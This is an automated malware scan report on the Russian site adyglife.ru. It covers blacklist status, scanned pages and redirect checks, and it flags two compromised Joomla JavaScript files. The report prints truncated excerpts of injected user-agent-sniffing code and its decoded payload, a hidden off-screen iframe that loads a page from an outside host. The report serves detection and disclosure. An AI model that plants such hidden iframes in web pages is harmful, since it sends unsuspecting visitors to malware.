Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=adyglife.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://adyglife.ru/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://adyglife.ru/ | 200 OK Content-Length: 31824 Content-Type: text/html | clean |
http://adyglife.ru/media/system/js/caption.js | 200 OK Content-Length: 9171 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function nerdglobus(){ var maloArticulo = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrow ...[2988 bytes skipped]... Decoded script: <iframe src=http://kukus.soundfactory-21.com/j75ekufyldy.html?mimimi style="position:absolute;left:-1399px;top:-1399px;" height="121" width="130"></iframe>
http://adyglife.ru/templates/gk_twn/lib/scripts/template_scripts.js | 200 OK Content-Length: 12734 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function nerdglobus(){ var maloArticulo = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/32',' new Fx.Styles(p,{duration:350}).start({ "width":"40px", "height":"40px", "top":(fintop+120)+"px" }); (function(){p.setStyle("display","none");}).delay(350); }).delay(200); }).delay(200); }); } } function changeStyle(style){ var file = $template_path+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk32_style',style,{duration: 200,path: "/"}); } Decoded script: <iframe src=http://kukus.soundfactory-21.com/j75ekufyldy.html?mimimi style="position:absolute;left:-1399px;top:-1399px;" height="121" width="130"></iframe> Antivirus reports:
http://userapi.com/js/api/openapi.js?45 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://adyglife.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 22674 Content-Type: text/html | clean |
http://adyglife.ru/plugins/content/joomthumbnail/gallery/highslide/highslide-with-gallery.js | 200 OK Content-Length: 47446 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js | 200 OK Content-Length: 9759 Content-Type: text/javascript | clean |
http://adyglife.ru/./ | 200 OK Content-Length: 31826 Content-Type: text/html | clean |
http://adyglife.ru/news-pictures-story | 200 OK Content-Length: 34837 Content-Type: text/html | clean |
http://adyglife.ru/job | 200 OK Content-Length: 23908 Content-Type: text/html | clean |
http://adyglife.ru/job/job-vacansy | 200 OK Content-Length: 22745 Content-Type: text/html | clean |
http://adyglife.ru/job/ | 200 OK Content-Length: 23909 Content-Type: text/html | clean |
http://adyglife.ru/job/job-resume | 200 OK Content-Length: 22739 Content-Type: text/html | clean |
http://adyglife.ru/job/job-vacancyadd | 200 OK Content-Length: 38131 Content-Type: text/html | clean |
http://adyglife.ru/job/job-resumeadd | 200 OK Content-Length: 47279 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: adyglife.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 17:10:30 GMT
Pragma: no-cache
Server: nginx/1.4.1
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 17:10:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f0ffd748ff2c9675a2f9768f36ee4afd=uencvg52ohiu2ak7f1g5fc9d95; path=/
X-Powered-By: PHP/5.3.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: adyglife.ru
Referer: http://www.google.com/search?q=adyglife.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.